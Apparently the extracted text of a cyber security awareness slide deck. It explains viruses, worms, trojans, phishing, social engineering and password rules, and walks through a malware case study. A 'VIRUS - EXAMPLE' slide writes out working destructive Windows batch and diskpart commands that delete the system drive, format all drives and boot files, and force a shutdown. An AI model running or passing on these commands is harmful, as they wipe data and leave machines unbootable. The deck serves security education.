CYBER SECURITY AWARENESS
THERE IS NO NEXT TIME, IT’S NOW OR NEVER.
“As the world is increasingly
interconnected, everyone shares the
responsibility of securing
• What is Computer Security
• Importance of Security
• Small business
• Cyber Security Statistics
• You are the target
• Cyber Scam
• 10 scams to watch out
• Leading Threats
• Security Plan
• Case – Malware
• Security issues
WHAT IS COMPUTER SECURITY ?
• Securing Computers, Smartphones, Networks, Internet.
• Defending information from unauthorized access, use,
disclosure, disruption, modification, perusal, inspection,
recording or destruction, unplanned events and natural
IMPORTANCE OF SECURITY
• The internet allows an attacker to attack from anywhere on
• Governments, military, corporations, financial institutions,
hospitals and other businesses collect, process and store a
great deal of confidential information on computers and
transmit that data across networks to other computers. With
the growing volume and sophistication of cyber attacks,
ongoing attention is required to protect sensitive business
and personal information.
Risks caused by poor security knowledge and practice:
Legal Ramifications (for yourself and companies)
Termination if company policies are not followed
• One of the best ways to make sure company employees will not make costly errors in
regard to information security is to institute company-wide security-awareness training
MOST SMALL BUSINESSES DON’T RECOVER
• 60% of small businesses will shutter within half a year after being victimized by
• 90% do not have an internal IT manager for security
• 87% do not have a formal written security policy
• 91% increase in attacks in 2013 (Symantec)
• 62% increase in the number of breaches in 2013
• Over 552M identities were exposed via breaches in 2013 (493%+ 2012)
• 38% of mobile users have experienced mobile cybercrime in past 12 months
• 1 in 392 emails contains a phishing attack
• 86% of all websites had at least one vulnerability
• Most data breaches (Retail/Merchant=15M, Financial/Insurance=8M, Other=6M)
• 100M phishing messages every day (Agari)
• 3 billion phishing messages monthly
• Phishing costs $70.2 billion (Cisco)
• Phishing cost corporate IT $28.1 billion (IID)
• 25% increase in email malware as URL
• 1 in 196 email virus rate
• 1 in 566 websites with malware
• 62% of UAE users cannot recognize a phishing message (Gulf News, Kaspersky 2012)
• 70% of phishing messages targeted bank accounts (RSA, 2013)
YOU ARE THE TARGET
• Explain to end users that they are the target. Far too often people have the misconception
that they are not a target, that their information or their computers have no value to
attackers. Of course we know this to be false. Anyone with an identity, computer or private
information is a target; cyber criminals have made an entire industry of hacking the end
1- Users know and understand they
are being actively targeted
2- Risks exist regardless of whether they are at
work or at home
3- Don’t be scared, just drive safe!
• Due to the high use of the internet, cyber scams have
disrupted bank accounts, sent viruses, and stolen
• Most cyber scams are sent through an e-mail account
wherein individuals will open the e-mail to either find a
virus has been put into their computer or to read
• Never enter personal information or credit card
information on unsecure websites, never reply to or click
on any links that you are not affiliated with, and never
respond to an e-mail or advertisement saying you have
• Rugby World Cup 2015, World Cup 2014 Brazil,
Auction sites, Jobs and training courses, Business 2
• Trojan Horse
• Social engineering
• A virus attaches itself to a program, file, or disk. When the program is executed, the virus
activates and replicates itself.
• Viruses result in crashing of computers and loss of data.
In order to recover/prevent virus/attacks:
Avoid potentially unreliable websites/emails
Re-install operating system
Anti-virus (i.e. Avira, AVG, Norton)
VIRUS - EXAMPLE
> @echo off
> del %systemdrive%*.*/f/s/q
> shutdown -r -f -t 00
> @echo off
> for %%i in (c ,d:,e:,f:,g:) do format %%i /FS:NTFS /x /q
> > list disk
> select disk 0
> create partition primary
> format fs=fat32 quick
> @echo off )))
> attrib -r -s -h c:autoexec.bat )))
> del c:autoexec.bat )))
> attrib -r -s -h c:boot.ini )))
> del c:boot.ini )))
> attrib -r -s -h c:ntldr ))
> del c:ntldr )))
> attrib -r -s -h c:windowswin.ini )))
> del c:windowswin.ini )))
> @echo off ))))
> ((((----shutdown -s -t 10 -c " "-----)))))
• Independent program which replicates itself and sends copies
from computer to computer across network connections.
Upon arrival the worm may be activated to replicate.
• Masquerades as beneficial program while
quietly destroying data or damaging your
• Download a game: Might be fun but has
hidden part that emails your password file
without you knowing.
Social engineering manipulates people into performing actions or
divulging confidential information. Similar to a confidence trick or
simple fraud, the term applies to the use of deception to gain
information, commit fraud, or access computer systems.
• Phone Call: This is John, the System Admin. What is your
• In Person: What ethnicity are you? Your mother’s maiden name?
• I have come to repair your machine…and have some software
• Email: ABC Bank has noticed a problem with your account…
• 1- It’s tough to create and remember strong passwords for each
online system or site you access.
• 2- It’s a BAD idea, though, to use the same password for several or
all systems and sites
• 3- contains 8 characters, a mixture of uppercase and lowercase
letters, at least one number and one non-alphanumeric character or
• A. Never share your password, write it down or save it!
• B. Strong Password
• C. Don’t use common words
• D. Change your password
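The password rules above as a checker, added here as an example and not part of the original slides. It reads "contains 8 characters" as a minimum length; the function names, the short common-word list and the sample vault are constructed for illustration.

```python
from collections import defaultdict

# Constructed sample list (assumption); a real check would use a large breached-password list.
COMMON_WORDS = {"password", "welcome", "qwerty", "letmein", "admin", "dragon"}

# Undo common look-alike substitutions so "P@ssw0rd" is still recognised as "password".
LOOKALIKES = str.maketrans("@4031$57", "aaoeisst")


def check_password(password):
    """Return the list of rules the password breaks (empty list = acceptable)."""
    problems = []
    if len(password) < 8:  # assumption: the slide's "8 characters" is a minimum
        problems.append("shorter than 8 characters")
    if not any(c.isupper() for c in password):
        problems.append("no uppercase letter")
    if not any(c.islower() for c in password):
        problems.append("no lowercase letter")
    if not any(c.isdigit() for c in password):
        problems.append("no number")
    if all(c.isalnum() for c in password):
        problems.append("no non-alphanumeric character")
    normalised = password.lower().translate(LOOKALIKES)
    if any(word in normalised for word in COMMON_WORDS):
        problems.append("built on a common word")
    return problems


def reused_passwords(vault):
    """Group sites that share one password; `vault` maps site -> password."""
    sites_by_password = defaultdict(list)
    for site, password in vault.items():
        sites_by_password[password].append(site)
    return sorted(sorted(sites) for sites in sites_by_password.values() if len(sites) > 1)


# Constructed sample data, not real credentials.
SAMPLE_VAULT = {"mail": "P@ssw0rd1!", "bank": "tR7#kq9Lm!vX", "shop": "P@ssw0rd1!"}

if __name__ == "__main__":
    for site, password in SAMPLE_VAULT.items():
        print(site, check_password(password) or "ok")
    print("reused on:", reused_passwords(SAMPLE_VAULT))
```

"P@ssw0rd1!" satisfies every character-class rule and still fails, which is why point C (no common words) is checked separately from point 3.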
• Bit of software that gets installed on your computer
unbeknownst to you, and starts logging everything that you
enter into the computer. This type of malware will often send
usernames and passwords back to the attacker, who can then
use this information to get into your bank accounts, social
media accounts, and really anything that would require a
username and password.
• 1- Antivirus
• 2- Firewall
• 3- Malwarebytes
• A sniffer is an application or device that can read, monitor,
and capture network data exchanges and read network
packets. If the packets are not encrypted, a sniffer provides
a full view of the data inside the packet. Even encapsulated
(tunneled) packets can be broken open and read unless
they are encrypted and the attacker does not have access
to the key.
• The act of sending an email to a user falsely claiming to be
an established legitimate enterprise in an attempt to scam
the user into surrendering private information that will be
used for identity theft.
• Every company needs to have a security program
• 1- No matter how large or small your company is
• 2- You need to have a plan to ensure the security of your
• how you will mitigate them, and planning for how you keep the
program and your security practices up to date.
• Risk Assessment
• Policies and Procedures (CIA)
• Business Continuity (BC, CP, IR)
CASE - MALWARE INFECTION
• Logan Industries
• is a multi-national catalog sale corporation with offices in 30 states
• most offices are small, with fewer than 50 employees,
• First Infection: Monday, Feb. 5:
• 20 employees at a satellite sales office received an email from the CEO and
President Andrew James with the message.
• Twenty employees experienced a computer shut-down a short time later
• wait for the help desk to contact them about fixing their machines
• The Virus Spreads: Tuesday, Feb. 6
• Early in the morning, the infection had spread from dozens of computers to
• After sending itself, it would cause the machine to reboot and never to recover.
• By 10 a.m., the CIO had been called and decided to form a team to deal with the
• Late Afternoon: Wednesday, February 7th
• find BadBoy on the disk drive and clean any infected files.
• they spent from five to 10 minutes manually removing the virus code from all file
• Users at Logan Industries had now been without access to a computer for three days
and were getting frustrated.
• The CEO requested a report
from the CIO. The report
included the following costs.
• They didn’t have any security
awareness for their employees
• The ability to describe the business
impact of virus/worm infection
• A comprehension of the
responsibilities of an IT staff in
delivering a secure environment
• The steps to respond to and recover
from a malware infection